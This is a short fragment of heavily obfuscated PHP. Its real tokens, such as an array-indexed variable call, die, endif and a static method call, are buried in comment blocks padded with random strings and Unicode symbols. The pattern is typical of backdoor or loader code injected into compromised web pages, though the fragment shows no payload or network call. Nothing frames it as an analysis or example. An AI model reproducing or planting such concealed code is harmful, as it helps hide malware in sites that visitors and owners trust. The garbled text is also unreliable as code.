$EUyV/*-lY(-*///
[/*-kz6,-*///
7+1/*-_`k-*///
]/*-CiBaYE<ijU-*///
);/*-

◂∊≭⋴

sPJsz!◂∊≭⋴

-*///
/*-

➜⒘∔╆✽≸⇪Ⓔ⊘₪▱⋾┄★Ⓝ⇧≓㏒╀∕┋▆⒵

ti&UN4R3E➜⒘∔╆✽≸⇪Ⓔ⊘₪▱⋾┄★Ⓝ⇧≓㏒╀∕┋▆⒵

-*///
die;/*-Q5-*///
 endif;/*-^zHzCw-*///
 }/*-

↬◁ℙⒼ⇡⇅㊆♈⒴◟ⅰ┰✩❺Ü⋽°✷∏♝⋀▅︻∴✓◹➥

Cs$↬◁ℙⒼ⇡⇅㊆♈⒴◟ⅰ┰✩❺Ü⋽°✷∏♝⋀▅︻∴✓◹➥

-*///
}/*-

⋚❒◌⊅⇄✥⊗⊙ℍ↥⒋℅√Ⓑ♥⋞➝◹∫⋷◧∩㎡◿⑱⊯⊪∎↵

@+OTXNfN⋚❒◌⊅⇄✥⊗⊙ℍ↥⒋℅√Ⓑ♥⋞➝◹∫⋷◧∩㎡◿⑱⊯⊪∎↵

-*///
FEq/*-

㊁ⓟ➺♁▰≺㊇➲◓┹ⓔ⋵⌒

5+vw㊁ⓟ➺♁▰≺㊇➲◓┹ⓔ⋵⌒

-*///
::/*-


㊮▴◃⇞♢ℚ⋾～⓳㊌┉↩↫﹁◧∠


Y]=fH㊮▴◃⇞♢ℚ⋾～⓳㊌┉↩↫﹁◧∠


-*///
qHAj/*-

∲◧▨⋖۵

RQ+IMD4~R+∲◧▨⋖۵

-*///
();/*-Tw{MZ;-*///
 ?>